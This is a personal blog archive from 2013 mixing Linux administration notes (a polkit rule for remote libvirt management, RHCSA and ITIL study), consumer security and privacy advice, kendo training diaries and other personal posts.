With Red Hat's default virtualization software KVM, it's possible to remotely manage the virtual machines running on a system. See here for some regular 'virt-ception'.

Out of the box, libvirt will NOT allow remote management of its VMs. If you would like to run a virt-manager connection through SSH, you will need to play around with Polkit-1. There is decent documentation available for the configuration of libvirt and Polkit-1, but I thought I'd provide the briefest of summaries.

Go into /etc/polkit-1/localauthority/50-local.d and create a file called (for example) 10.libvirt-remote.pkla. This file should contain the following entries:

[libvirt Remote Management Access]
Identity=unix-group:libvirt
Action=org.libvirt.unix.manage
ResultAny=yes
ResultInactive=yes
ResultActive=yes

This setup will allow anyone with (secondary) group "libvirt" to manage VMs remotely. That's a nice option to put into your standard build!


kilala.nl tags: , , ,

View or add comments (curr. 0)

Security measures all of us can take - part 2

2013-07-14 23:28:00

As a follow-up to my previous post on common sense I'd like to touch on Internet privacy. 

A few months ago I decided it was time to clean up my presence in social media. Using various plugins and a with a lot of patience I managed to clear out every post I had ever made to Facebook, Google Plus and Reddit. This decission followed after one-too-many privacy changes on Facebook and the realization that despite my best intentions I was still sharing a lot of information. I now regularly go over all of my social profiles to ensure nothing is "leaking out", as all parties involved have proven not to care too much about your privacy. 

What's more, is that I've come to reconsider my online profile. You know how we warn our kids never to give out their real names on the Internet? Or their address and whatnot? Isn't it ironic then, that I've been doing just that for well over a decade? Not only that, but I've kept a pretty detailed diary and have interacted with thousands of people through dozens of forums. I've used the same alias in all of those places, making myself very identifiable. 

Better late than never, but I've finally come to the decission to try and break down that online persona as well as possible. Wherever I can I've taken to changing my usernames and identifiers. That's one hint for people: don't use the same name everywhere.

A second point: on many forums it's not possible to delete all the posts you made. Most forums are of the opinion that providing an option to delete one's whole history is detrimental to both the discussions and to the content of their site. And of course they're right. So if you want to start culling posts you will either need to be selective and pick the worst stuff, or you'll spend hours upon hours manually deleting each and every post you made. Luckily there are tools to help you out, like Greasemonkey scripts that can automate browser tasks: to delete reddit comments, or to clean your facebook timeline. They're not foolproof, but it helps.  

Remember: just about everything on the Internet is forever. If it's not people making copies of your photos or text, it's companies! The famous Internet wayback machine regularly snapshots whole websites for posterity. And sites like Topsy.com shamelessly take your whole Facebook/Google+/Twitter feed and retain fully searchable copies on their own website. 

It's been said before and it'll be often repeated: think about what you post and to whom you make it available. Review your privacy settings on social media frequently and think hard if you want something to be shared across the globe. 

That's why I've decided to dedicate the public version of this website to my professional activites: work, programming, learning. All of the other things will be passworded and only available to myself and my family. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Finishing the 2012/13 season early

2013-06-16 10:35:00

Ever since the 04/28 Centrale Training my right knee has been giving me trouble. Sharp pains below the disc, probably where a bunch of muscles connect, occur whenever I walk stairs or when I rotate my leg. 

Aside from having to see a doc, I've decided to finish the 2012/13 season a bit early. My knee needs rest. I'll still be attending class for the last few weeks of the year, but only for mitori geiko, for social contacts and to help out with shinai maintenance etc. That's exaclty what I did yesterday: I fixed six shinai, had a short chat with a few people and helped out Kris-fukushou here and there.


kilala.nl tags: , ,

View or add comments (curr. 2)

Security measures all of us can take

2013-06-10 16:47:00

Recently I've been on a bit of a security-binge at home. This blog post may have been tagged as "geeky", but as the title says I'll be going over a few things all of us should be familiar with. At least, that's my opinion... These days you're taking risks if you don't use these measures.

1. NFC security

Per this week, ING Bank are providing customers with NFC equipped debit cards. It's not optional, it's in every single card. NFC, Near Field Communications, is a technical term for what most of us will know as "contactless transactions": the chip card used in dutch public transport, or the ICOCA/Pasmo/Suica cards from Japan. In ING's case, this means that your debit card can now be used for payments, simply by holding your case close to a payment terminal. Payments under €25 will not require an authentication using PIN and payments are charged directly to your account. It is not a charge card, like Suica or OV Chip

Because NFC features will be featured in more and more products, now is the time to start thinking about securing your cards. Your bank card, your credit card (Visa also has NFC), your public transport card and of course also the access cards for the office! While many parties tout an effective range of 2-4cm for NFC, in actuallity there have been many test cases where NFC cards were activated over ranges from 30cm to several meters.

I'm calling it right now: the buzzword for 2014/2015 will be "crowd skimming".

crowd skimming nfc rfid clone steal

Miscreants will simply hide an NFC skimmer in a backpack and start walking through busy crowds. Imagine how many cards could be copied, or transactions could be made by walking around a train station or a music festival!

Protection is easy and I'm sure that by 2024 most wallets sold will come with this feature: shielding. There are many DIY projects online for aluminum lined wallets, but they're also for sale. DIFRWear is a famous example, as is the dutch designed Secrid. Instead of spending €25-€50, I got a Safe Wallet from Marskramer at a low €2,99 (free shipping)!

2. Passwords

Everyone's heard it before: "don't use simple passwords!

Make your password hard to guess, don't use the same password for multiple accounts, change your passwords regularly. Most people know these rules (best practices?), but many don't adhere to them. And I understand! They're a hassle! Every few months I need to manually visit over fifty websites to change passwords and it's a pain. But that doesn't mean you shouldn't do it!

Luckily password managers will make life a lot easier for you. There are many to choose from and I went with 1Password. At its most basic, 1Password becomes your safe storehouse for all your passwords (and other confidential information). But where it shines is its browser integration, that will allow you to automatically login to your websites. For example, I visit Facebook.com and ask 1Password to login for me, which it does. Done!

The great thing about this, is that it makes complex passwords effortless for you! Have a hard time remembering a sixteen character, random string of letters and numbers? You won't need to, because 1Password fills it out for you. And access to your password vault is obviously protected by one very strong password, hence the name of the product :)

If you'd like to take your passwords with you on the road, for use on another computer, then 1Password can provide you with a smartphone app for iOS or Android. You'll always have all your passwords with you, safely encrypted and protected.

EDIT: The newly announced iCloud Keychain will be another good option for Mac OS users. And of course Keeppass is cross-platform and free. Also, be sure to check out the different managers as some are not without issues.

3. Multi-factor authentication

The problem with username-password authentication is that in many cases your username is plainly obvious. Often it's your email address, some permutation of your name or a nickname that's out in the open. That leaves only your password as the true secret and as was discussed at #2, often it's not a very good secret to begin with!

One solution to this problem is to add another factor to the authentication step. Next to using something that you know (name and password) you'll often see the use of something that you have, like an OTP token.

Many websites will allow you to enable two-factor, or multi-factor authentication. E-Banking sites have historically used random number generating tokens, or "calculators". But these days it's becoming common for more and more sites and applications. Facebook, LinkedIn, Google, Wordpress, Evernote, all of them let you use a smartphone app or they'll send you an SMS with a one-time code. Thus your smartphone becomes the "something you have" factor, which will generate codes for you. 

Personally, I've come to use Google Authenticator for many of my accounts. It's free and it's open source. Best of all: while it may be Google in name it does NOT run on Google servers. It's 100% between your phone/PC and the account in question. Google Authenticator is wonderfully flexible, insofar that it can be integrated with any service you can think of. Obviously it's being used by websites, but it can also be integrated into applications (like Evernote) and into PAM-compatible Unix services so you can use it for your SSH logins.

4. Whole disk encryption

Most of us don't give much thought to all the data stored on our computers, but to be honest: for most of us our whole lives are on there. Emails, documents, photographs and plenty of secrets. Bank details, credit card numbers, passwords and confidential data. Is it really a smart idea to leave that stuff unprotected, to be read by anyone willing to steal your stuff? No.

That's where whole-disk encryption comes in. This solution renders your whole hard drive unreadable, unless you have the password. Your computer won't boot, nor can anyone go through your files, with the password. In this day and age most computers are also fast enough for you not to notice any real slowdown thanks to the encryption. 

There are plenty of commercial products available, but there's also free stuff out there. TrueCrypt is free and open source and is cross-platform (Windows, Linux, Mac OS X). BitLocker is included with some versions of Windows and FileVault comes standard with every Macintosh since Lion / 10.7. 

EDIT:

Darn, I'm not the first one to coin "crowd skimming". This blog used it earlier, but to refer to copyright trolling bittorrent users, sueing them for damages.


kilala.nl tags: , , ,

View or add comments (curr. 3)

Here's the mountain, now start climbing

2013-05-26 20:28:00

Today I passed my ikkyu exam in kendo.

Ikkyu, being the final grade before shodan ("black belt"), means that you're on your way to understanding kendo and that you almost grasp all of the basics. Almost. The real hard work starts now :)

As I said to my friends who also took their exams today: "The introductory class is over, we are now rank beginners". Another analogy would be that a guide has shown me the mountain and that I now need to start climbing it. My foot is on the first step of the stairway. 

I am very happy that all of the help my sensei and sempai have given me and that my 2.5 years of effort have led to at least some progress. Also, obviously I wouldn't have come this far without the continued support of my lovely wife and of my friends who cheer me on.

If anyone's interested, my dear friend Menno shot a video of my kirikaeshi and my two jitsugi. I was very happy to hear his reaction about my kendo, to paraphrase: "This is cool stuff! I now understand what you meant when you said your lung capacity was useful; your kiai kicks ass!". ( ^_^) I'm the one starting on the left, as Tomokiyo-san put it: "Lucky number 7".

ThomasIkkyu.m4v


kilala.nl tags: , , ,

View or add comments (curr. 4)

A sobering review

2013-05-18 21:45:00

a graph

"I don't think you understand what this thing is for." he said, gesturing with his shinai.

It didn't hurt as much as Zicarlo-sempai's stab to the stomach, but it stung a bit anyway. Only a little though and I'm putting aside the emotional aspect, to analyze the technical message behind it. Instead of sulking, it makes me want to train three or four times each week! Were I not a family man, I'd sign up with Museido right away for more practice.

But let's backpaddle a bit to the beginning. 

Today's class in Amstelveen was great, with a big turnup and an all-star cast. Our usual crew was expanded with a few high placed teachers and students from Museido and Fumetsu. A chance for us all to learn something new!

Class followed the usual structure: kata, warming up, kihon, jigeiko. To prepare for my upcoming ikkyu exam I practiced kata with Zicarlo and Hans, learning the fifth kata along the way. I'm actually pretty happy with how that went, though there wasn't much tension between us. That's something to work on. 

Kihon practice went alright, though I let myself coast through it too much. I often let my body run on autopilot instead of paying attention and being fully aware of what's going on. That's not right. And yes, my chisai techniques are still awful. Given my lack of stamina I'm happy to say I did not take the short break that was offered between kihon and jigeiko, but instead jumped into a little shinsa practice with Zicarlo. "Every week a little stronger" as I keep telling myself in mokuso.

Seeing how the chance rarely occurs, I lined up with Mark Herbold-sensei for my second jigeiko. I first met him a few weeks ago at the CT where he impressed me with his teaching style and personality. After Tsuyuguchi-sensei's admonishment ("You should hit!") I'd picked up my pacing considerably, so I tried my best with Mark. In my mind I was not backing down and I was giving it multiple shots in a row. Compared to a few weeks ago I thought I was doing better. Maybe I was, meaning that I was pretty darn bad a few weeks ago ;)

After class I went to pay my respects and to get some feedback from Mark. You already know how he opened: "I don't think you understand what this thing is for." he said, gesturing with his shinai. Direct. No sugar coating. But definitely not the only thing he said, because he took quite some time to explain. 

That was the big take-away from today: be ready to jump and kill from the get-go, don't start building your energy after you've already engaged your opponent.

It was a sobering experience, which is something I need from time to time to remind me that I really am a rank beginner. But I'm going to use it to motivate myself. And yes, I'm still going to take the exam next week, simply to get an appraisal of my current level. It'll be a learning experience, however it turns out.


kilala.nl tags: , ,

View or add comments (curr. 0)

It's the small things

2013-05-08 08:38:00

mr Miyagi

Yesterday's training has two big take-aways for me.

  1. I should never break kamae, especially if I'm tired.
  2. I should hit. ( ^_^)

Throughout class I had been paying attention to all my weak points: only use my left hand, relax in kamae after kakegoe, don't have my left heel too high, proper timing of strikes and fumikomi, practice my chisai men strikes in the right way and keep on pushing through the exhaustion. I was feeling pretty good about myself! I managed to get through five of the six rounds of jigeiko too :)

Then comes the time to do jigeiko with Tsuyuguchi-sensei. He attacks me a few times, I attack him a few times but I leave plenty of openings unused. Then we get into tsubazeriai and he looks me in the eye smiling and says:

"You should hit."

I keep on making glancing blows against him and I often fail to grasp an opening he makes for me. Again in tsubazeria he smiles and repeats: "You should hit. You should hit." And he's right. Obviously. :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Working towards my exams

2013-05-06 08:19:00

Change of plans! A few weeks ago I had a chat with Marli, who'd asked me if I still wanted to take my ikkyu exam by the end of May. Originally I'd take the test in winter because of our wedding anniversary, but since we're taking a few days of fun midweek she wanted me to go anyway. Yay :)

I'm feeling pretty confident about taking the ikkyu exam, insofar that I -know- most of the things I need to demonstrate. Most of the things I can actually do well, but I am not certain that my fighting skills are at the level that's needed. The most important weak point is my hunger/bloodlust: as Donatella-sensei remarked months ago I attack a general direction, not a specific target.

Saturday's class was great and started off with a nice surprise: our friend Sebastian, who departed for Germany a few months after I started kendo, came to visit for some jigeiko! In the absence of Ton-sensei and Hillen, Kris-fukushou led class with kihon and jigeiko. Many things were said and done, some important pointers being:

For me personally, Kris had two important points of feedback:

As my mantra for mokuso goes these days: "every week a little stronger"... Despite getting more and more tired, I fought myself through jigeiko.


kilala.nl tags: , ,

View or add comments (curr. 0)

Centrale training: shiai and shinpan training

2013-04-28 21:03:00

Today was hard work! Over sixty people traveled to Sporthallen Zuid in Amsterdam for the national level 'central training'. This month's edition focused on shiai and shinpan skills, meaning both the fighting and the referreeing of competitions. Today, Renshinjuku's turnup was also impressive with a dozen members attending. Excellent :)

It was a lot to take in! Before lunch, Mark Herbold-sensei took us through kihon in order to practice legwork and speed. He impressed upon us the importance of moving from the legs and hips, with 80% of your effort coming from there. The remaining effort is 10% stomach to retain posture, then 8% and 2% left/right hands for the strike. By properly using your hips and legs you assure that you close in quickly and that you retain control of the situation.

Exercises included kirikaeshi, oki-men, oki-kote-men, hayai kote-men and then a number of hayai variations of kote-men, kote-men-men, kote-kote-men, kote-men-kote-men and so on. In each of these, the connection and distance between both kendoka was key: kakarite needs to move in fast enough to pressure motodachi backwards. Motodachi needs to be surprised and should not dance backwards before the attach. Learning this speed and pressure is what will help you overwhelm your opponent in shiai

After lunch Vitalis-sensei went over a few basics regarding referreeing: valid strikes and hansoku (violations).

A valid point only has the following five requirements:

  1. Using the kensen, the top 1/3 of your blade.
  2. Using the hasuji, the cutting edge of the blade.
  3. On the datotsu-bui, the proper part of the target.
  4. With fighting spirit.
  5. With proper zanshin.

Salmon-sensei has written a little more about what makes a valid ippon. Vitalis-sensei remarked that many things that we learn are important for a strike (like ki-ken-tai-ichi) are NOT in the rulebook. This means they are NOT required for ippon. He also impressed upon us that there are two common mistakes that beginning shinpan make:

After Louis' introduction the sixty kendoka were divided across three shiaijo, each led by a high ranking sensei. I was assigned to Mark Herbold-sensei's shiaijo. He led the session with clear instructions and a pleasant amount of humor. He explained so many things, it's hard to remember them all. The following will simply be a stream of conciousness, trying to recall as much as possible of what was said.

The following points were made for me specifically:

 

The last hour of the day was free jigeiko. Sadly I had to leave early, but I'll get another chance later :)


kilala.nl tags: , ,

View or add comments (curr. 0)

"Let's do it!" kendo etiquette poster

2013-04-22 23:40:00

kendo etiquette poster

I recently found myself inspired by Bunpei Yorifuji's famous "Please do it..." campaign posters promoting etiquette in the Tokyo subway. They are catchy, they're a bit funny and they manage to drive home a message clearly.

"What if", I thought, "we applied the same design esthetic and message to kendo?". Thus work has started on a kendo-centric set of "Please do it..." posters. First up, based on last weekend's shinai inspection, is a poster about maintenance. It is everybody's duty to ensure their equipment is safe and that no harm can be done to your fellow kendoka. Loose splinters on shinai may pierce somebody's eye!

The Japanese sentences were made using JEDict and Google Translate, so I'm sure they're full of mistakes. Please correct me!


kilala.nl tags: , ,

View or add comments (curr. 0)

Making a juban (undershirt) for kendo

2013-04-20 08:13:00

a cotton under shirt for kendo

With summer coming up I'm looking for ways to minimize wear and tear on my keikogi, the thick jackets we wear in kendo. The keikogi suck up loads of sweat and thus become pretty dirty very quickly. Unfortunately they also fade quickly and the rice-grain pattern also wears out pretty quickly if you launder them often. 

Traditionally, to keep expensive silk kimono clean, people wear juban which is a simple cotton undershirt. When I say "simple" I mean "less elaborate than a kimono", just check out the Pinterest on juban. There are even simpler juban, which look like thin white keikogi, sold by budogu such as Yamato. And that's exactly what I need, but I'll be damned if I pay $30-$40 for a simple shirt! That sewing machine isn't simply gathering dust in the attic!

Because I don't have any cotton lying around just now, I've modified a few of my old projects. Years and years back, when I was still in the SCA, I made two cotton under-tunics. Meant to be worn under my full-length tunic as an extra layer, they were thigh-length and had long sleeves. In order for them to be worn as juban, I have shortened the sleeves and the body so they don't show from under my keikogi

So now I have two neat undershirts for kendo... And they even have embroidery on them! 

And to think I made those things fourteen years ago! Fourteen! ( O_o)


kilala.nl tags: , ,

View or add comments (curr. 2)

I was going to write, but then I fell asleep

2013-04-17 08:11:00

Hoooo boy, last night's training was good! Despite my hay fever I soldiered on and because of that I was dead tired when I came home. I managed to unpack my equipment bag, but nothing more. The moment my head hit the pillow I was g.o.n.e. Boom. I showered at the office just now ;)

Last week and yesterday class was led by Jouke-sempai, who was in the Netherlands for last weekend's EKC. Where we usually practice upwards of six techniques a night in 2x(2x5) bouts, he now had us repeating the same technique in a 2x(5min) setup. This dramatically lowered the amount of different things we got to try, but there are two huge benefits:

  1. Muscle memory
  2. The time to reflect

During kihon practice we focused on men (both oki and hayai), hayai kote and kote-men and finally hiki waza. The following points were made:

The past weeks, Hillen-sempai and Ton-sensei reprimanded me for my horrible hayai kote. I keep going in arcs, which messes up the practice we're doing. Yesterday I got the same reprimand from Miyahara-sensei. She had me do it over and over again, until I started showing something resembling a good kote-strike. Straight and through the center, no need to raise it high, no need to go wide.

Tsuyuguchi-sensei spent a lot of his time explaining hiki waza to me. Most of it was in Japanese (probably because I had given the impression that I speak it) so I missed big parts of it. However, the essence of what he tried to convey is this:

  1. Keep your hands low and lock the tsuba.
  2. Tsubazeriai is all about the hips, push from the hips.
  3. Put strong pressure against your opponent and push away.
  4. Did I say it's about the hips? Because you need to work from the hips!

I really appreciate the effort he put into explaining these things to me! It's the first time we've really spoken, so I went up to him after class to thank him again. Point #3 is a bit confusing for me, because I have often been told not to put any pressure in tsubazeriai. Not until you actually push off for your strike.

In jigeiko I had the chance to spar with Miyahara-sensei, who went over hayai kote with me some more. Try, try, try and try again. We also tried a number of other techniques, with her seemingly focussing on hayai men and debana kote. I also started jigeiko with Onno-sempai, but I had to bow out early because of my dizziness (thankyouverymuch hay fever). I spent the last ten minutes of class helping out our kouhai Gaby in practicing her kote strikes and footwork.

I haven't written much about kendo the past two months. Here's what happened.


kilala.nl tags: , ,

View or add comments (curr. 0)

Virt-ception: we've got to go deeper

2013-04-11 20:45:00

Desktop

I'm currently studying for my RHCSA certification. As part of the exam I will need to work with KVM virtual machines, which require a proper piece of hardware to run on.

Sadly I haven't been able to boot CentOS off a USB drive on my Macbook, despite numerous attempts. I've had a number of great tutorials, but no dice. Luckily my colleague Peter (not the one of the iMac) came to the rescue! He runs a sandbox system at home, which is a great playground to study for the RHCSA. He gave me an account and permissions to fiddle with KVM. 

Which is what landed me with the screenshot above. That's:


kilala.nl tags: , , ,

View or add comments (curr. 2)

A dream come true

2013-03-10 21:00:00

my new iMac G4

A few days ago I was discussing various models of Apple computers with one of the other consultants at the office. It didn't take me long to wax lyrically about the iMac G4, which in my opinion is the most beautiful PC ever produced by Apple. It combined good specs with a revolutionary design: the sunflower / lampshade design was really new. In my opinion the flexing arm for the screen really is one of the best inventions ever and I'm sad that the only way to get one with normal monitors, is to buy an expensive extra mount. 

Anyway, my colleague Peter overheard us talking and wondered whether I'd be interested in owning an iMac G4. DO I?! Haha, of course! It's been a dream of mine for a damn long time. The above paragraph should have made it clear that I love the design of the machine and that I consider it a timeless classic. Which is why he offhandedly remarked that his girlfriend has one at home, one they've considered sending to the scrapheap for a while now. Holy carp! ( O_o)

So here I am! Giddy and gleeful! Because what I now own, with many thanks to Peter and Ellen, is an iMac G4/1.25 17-Inch "FP" (USB 2.0). Or to put it in human words: the latest model of the iMac G4 series, with the improved TFT screen as well as USB2/FW400. It's from the same era when I bought my first Macintosh, the venerable Powermac G5 (aka, the first "cheese grater"). And it's in pristine condition, because they hardly ever used it. It's beautiful! It's complete (no parts missing) and it's now mine :9

The setup above is just about exactly how you'd expect to see it in 2003, with the exception of the speakers. The Apple Pro speakers look great, but they really don't sound too great. So I've replaced those with the LaCie Firewire Speakers that I bought years ago. These really sound awesome and come with a minimum of cable fuss as they are also bus-powered.

The iMac came with OS 10.4.11 installed, which is pretty old already. Unfortunately I don't have my 10.5 DVD anymore (returned to Snow when i left their company), so I'm borrowing a friend's install disk. When it's upgraded to 10.5 I'm sure it'll make a heck of a nice machine. Heck, even at 10.4 it's already very nice and completely usable. I'm actually surprised at the performance! The 1.25GHz G4 and the 768MB RAM work very nicely.


kilala.nl tags: , , ,

View or add comments (curr. 6)

A visit by Furuya-sensei

2013-03-06 10:29:00

It has been a month of remarkable kendo! First there was the big party, then last week was a tiny group of people and yesterday Furuya-sensei paid us a visit. Stopping over for a single day on his way to the Furuya Cup in Peru, he made sure to come observe the dojo he helped raise in the Netherlands. We were also joined by Mark Herbold-sensei, who recently achieved 7-dan.

With roughly thirtyfive kendoka attending the training session we used the motodachi system, with anyone 3-dan and higher acting as motodachi. We worked on solidifying our basics: kirikaeshi, men, kote-men and kote-do. We closed with half an hour of jigeiko.

The following points were stressed during class:

Because our founder's sensei was present, a lot of attention was paid to mistakes in etiquette. For example:

Furuya-sensei indicated that he was happy to be back in the Netherlands and to train with us. He hopes that we will continue training hard, working on improving our kendo. He also hopes that next year we can organize another Furuya Cup in the Netherlands, as it is an important tourney in Europe.

In jigeiko I practiced with four people:

  1. I started with Bert Heeren-sensei. He took me through a mix of uchikomi keiko and kakari geiko, where he either showed an opening, let me make one or where he attacked me. He indicated that he was pleased with how I was doing, with regards to the effort I'm showing. He didn't comment on my kendo, as his goal with our jigeiko is mostly to make me fearless. I should not fear my opponent, nor should I hesitate, regardless whether I'm up against a kouhai, a sempai or a 6-dan teacher.
  2. After being absent for a few months, I'm glad I got to spar with Mischa. I mostly tried to practice chisai men and debana kote, but threw in some other stuff as well. I'm nowhere near his level yet (obviously, as he's 3-dan I believe), but I hope that we both took something away from the practice.
  3. I also ran it hard against Jeroen and Davin, with whom I am roughly on par. These two rounds of practice were excellent to go all out and thrown in the last shreds of energy I had.

kilala.nl tags: , ,

View or add comments (curr. 0)

Overview of dutch kendo dojo

2013-02-28 07:20:00

Yesterday I spent a few hours gathering information on all dutch kendo dojo. The NKR only has a list of city+dojo name on their website, which isn't terrifically navigable. I took the list, gathered all the website information and then gathered all dojo locations. I then spent an hour putting them all into a Google Maps project. The result: a map of all dutch kendo dojo.

 

 

Also in dutch, so dutch kendoka can find it:

Gisteren heb ik een paar uurtjes besteed aan het verzamelen van informatie over Nederlandse kendo dojo. De NKR heeft een lijst met steden en dojo namen op hun site staan, maar heel erg handig werkt die niet. Ik heb van alle dojo's op de lijst een overzicht gemaakt van hun website, plus het adres van hun trainingslocaties. Daarna kostte het me een uur om ze allemaal in een Google Maps project te zetten. Het resultaat: een overzicht van alle Nederlandse kendo dojo, op de kaart.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Booyah! My biggest failing in kendo analyzed

2013-02-24 21:49:00

My wife, ladies and gentlemen! My dear wife just helped me figure out one of my biggest failings in kendo!

Countless times I have been told by various teachers that I double-step or step through when jumping in for a strike. I keep getting warned about it, but I've never conciously felt it happen. Sure I was aware that I keep shuffling my feet to find footing for the lunge, but I've never felt the "step through with left" happening. Until last night during the big training, when I think I felt it happen at the back of my head. 

But that's not the big succes here. No, that's my wife's analysis of the same situation!

Watching me do kihon practice, she noticed that my whole body teeters to the right when I'm about to lunge. It happens especially when I start leaning in for the lunge. And then, when I lunge, she sees me pull left up to the right foot (or past it!) after which I actually jump.

And the answer is!.... *drumroll* Weight distribution!!!

I keep my weight too much on the front leg and then I only increase that when I start leaning in for the lunge. Earlier, I learned that back-front should be 60-40 at rest. In my case it's probably reversed: back-front is 40-60. Then it gets worse when I lunge, going to 20-80! THAT'S WRONG! How can I jump from the left foot, when all my weight is on the right?! That's right, I cannot! Which is why I instintively doublestep/overstep, to get the weight back on the left foot. 

I'm so grateful that she saw through that! This really gives me clear details to work with.


kilala.nl tags: , , ,

View or add comments (curr. 8)

Anxieties and living with them

2013-02-24 21:27:00

The past few months I've been dealing with my anxieties in what, I hope, is a better way than before. Having been through CBT has certainly been empowering and educational. That doesn't mean that I'm free of anxiety, but it does mean that I've learned ways of dealing with them. 

Funnily, yesterday I had a bout of anxiety when we dropped off our daughter with her grandparents in Friesland. Plenty of doubts and worries pent up about her sleepover, which led to some physical effects while we were there and on the drive home. I was also a bit anxious about the night's kendo practice. All of that was mostly resolved by talking about it with Marli, which certainly is one of the prime methods I've learned: dispelling illogical and worrisome thoughts with the help of others. 

I am writing an article for Kendo World magazine, based on my experiences with anxiety and kendo. The article will explain what anxiety disorders are, how they are treated, how I've experienced it and how it can occur in a kendo dojo. If everything goes as planned it'll be printed in the next issue. Exciting!


kilala.nl tags: , ,

View or add comments (curr. 0)

Successes from coaching

2013-02-24 20:52:00

Keuzes Maken

For the past few months I've been undergoing personal coaching, by Menno. Today we simply spoke about the successes I've booked over the past few weeks. All of them were brought on by actions I undertook based on the coaching i've been receiving. Each of the following was an 'action point' or 'todo' item from our sessions. 


kilala.nl tags: , , ,

View or add comments (curr. 1)

An awesome night of kendo with friends

2013-02-24 20:16:00

Training

Yesterday was wonderful, a great night of kendo and of building friendship. Renshinjuku Kendo Dojo organized a big training and buffet party in honor of a few of our members. Fukuyama-sensei and his family, as well as Tanida-sempai and his family are returning to Japan. Also, Kurogi-sensei recently achieved seventh dan ranking. Great reasons for a 'Sayonara & Omedetou' (farewell and congratulations) party.

Marli came with me, which means a lot to me. Last time she hadn't enjoyed the buffet very much, so it says something that she tagged along again. Sweetie <3 Double-sweet, because she spent some time taking notes about my performance.

I was expecting a bigger turnup than usual, as it was the Saturday afternoon training. What I did NOT expect was sixty to seventy kendoka turning up! Kurogi-sensei brought along a number of his students from Belgium and a five-strong delegation from Scotland was also in town, for today's Iijimia Cup. Because it was such a big group we ran the night in the motodachi system, with twelve higher ranking teachers lining up to train with all students. Roelof-sensei took care of the fifteen beginners.

Training consisted of kihon and a few waza: kirikaeshi, oki-men, oki-kote-men, chisai-men, chisai-kote-men, men-taiatari-hiki-men-men, men-taiatari-hiki-kote-men. Then an hour of jigeiko! I sparred with Fukuyama-sensei, a gentleman I am not familiar with and with Tsuyuguchi-sensei.

I always enjoyed working with Fukuyama-sensei, so I'm sad to see him go. There's just something cool about his ever-smiling face behind the mengane. In the photo above I'm at the far right, practicing chisai-men with Fukuyama-sensei.

During jigeiko I was feeling the effects of the afternoon's anxiety and I was close to quiting three times. But every time I thought "just one more fight" and then I pushed through. It sure helped that, during waza practice, Heeren-sensei shortly took me aside to compliment me, reassuring me that I was doing alright.

Dinner was nice and we enjoyed a good, long chat with my kendo friends. Jeroen, Zicarlo, Davin, Nienke, Gaby, all fun people to talk to about kendo and other geekery :) I also had a nice, open-hearted talk with Heeren-sensei which provided me with some much-needed insights.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Starting preparations for RHCSA

2013-02-21 22:31:00

Well, this is a first. Sometime soon, my Macbook will be booting another operating system than Mac OS X for the very first time in its life. Sure it's run Solaris, Fedora and Windows! But that was using Parallels virtual machines...

In order to prepare for the RHCSA certification I will need to learn about setting up virtual machines on a physical Linux box. And since we don't have the €200-€300 to buy a test box (which I'll only use for these two exams) I'm stuck using my primary laptop. That means I will be taking notes locally on Linux, which should be a cinch using the Evernote web interface.

I just hope that running CentOS on an external USB 2.0 drive hooked up to my 2008 laptop won't be too slow to work with :)


kilala.nl tags: , ,

View or add comments (curr. 0)

ITILv3 certification achieved

2013-02-17 08:55:00

ITILv3 certificate

Right, that's out of the way!

In late december I made a plan for 2013, which would enable me to retain my CISSP certification while at the same time restoring my relevance to the IT job market. A few weeks later I got started on my ITILv3 studies, but those ground to a sudden halt when I chose an awful book to study from. A week later I started anew using the study guide by Gallacher and Morris, which is a great book!

A month after starting the Gallacher and Morris book I took my exam using the EXIN Anywhere online examination. I didn't want to spend time away from the office to take this simple exam, which is why I went for the online offering. I'm very glad EXIN are providing this service! I thought I'd share my experience with the EXIN Anywhere method here.

I also provided EXIN with two pieces of feedback after taking the exam.

  1. During the setup phase, you are allowed to re-take your photograph and to re-take the photograph of your ID card. However, there is no option available to restart the room inspection. During my room inspection an error popped up from the proctor software which suggested that filming could maybe not be completed. But no definitive answer was provided and there was no option to restart the filming of your workspace. I sincerely hope I don't get failed on the exam because of this.
  2. The exam format is rather unfriendly, when compared to other computer-based exams. In essence it is simply a long HTML document with all the questions underneath eachother. Other testing suites (though admittedly offline) put the questions in much more user-friendly format. One question at a time, an option to mark questions for review, etc.

All in all I'm happy with how all of this went and it's certainly nice to have refreshed my ITIL knowledge. I last studied ITILv2 in 2001.

The fact that it took me a month to study for this test worries me a bit though. The total prep time for ITILv3 was 15 hours (translating into 15CPE for my CISSP). I'm fairly certain that my RHCSA will easily take over 80 hours, which does not bode well. I reckon it might be somewhere between my LPIC and my CISSP studies when it comes to workload. If I want to achieve it within a reasonable timeframe, I will need to stick to a much stricter regime. 


kilala.nl tags: , ,

View or add comments (curr. 1)

Bad kendo, great training and moral dilemmas

2013-02-13 07:49:00

Last night's training was awesome: I was beat by the end, knowing I certainly gave it my best effort.

Unfortunately my kendo was crap, because every little bit of basics was wrong. I was pulled aside by every single senior sempai with whom I crossed shinai! Heeren-sensei grabbed me twice, once to point out mistakes in my striking and once adminish me on my footwork. The same footwork issues were also reported by both Koseki-sensei and Kiwa-sempai. Ran-sempai sternly indicated that I constantly dropped pressure in jigeiko and that I was not even responding to any of the openings he made. Makoto-sempai saw right away that my timing of ki-ken-tai-ichi was completely dead and Miyahara-sensei complained about a headache from my men strikes by the end of class. She didn't think I was striking too hard or with too much right-hand, but mostly from too close range.

So every little bit of basics was wrong: footwork, striking, tenouchi, timing, ki-ken-tai-ichi, swinging, shinai grip. Everything. I didn't allow myself to get too frustrated because all of it, only getting irked a little right after the explanation and then moving on.

On the way home I had a good talk with Jeroen-sempai, about the future of our Almere dojo. We both feel that the dojo could use a heavy dose of discipline and rigour and that it would be great if it started mirroring the Amstelveen dojo. We are however unsure how this could be achieved under the current leadership. In the past I've already been told by sensei that my stance is to strict and that my teaching of the beginners' group was too harsh and that enforcing discipline to the degree I'd desire would scare off all the beginners.

Jeroen and I will be submitting a few suggestions pertaining to class structure and instruction to beginners. Most importantly, Jeroen thinks that our whole group would be best served by focusing more on basics than on waza practice. Every week the bogu-group spends a lot of time practicing many different waza for a tiny amount of time and Jeroen would suggest that we instead divide our practice into a monthly schedule: weeks 1, 2 and 3 are spent practicing one specific subject and week 4 will merge them all. I certainly think his idea has merit!

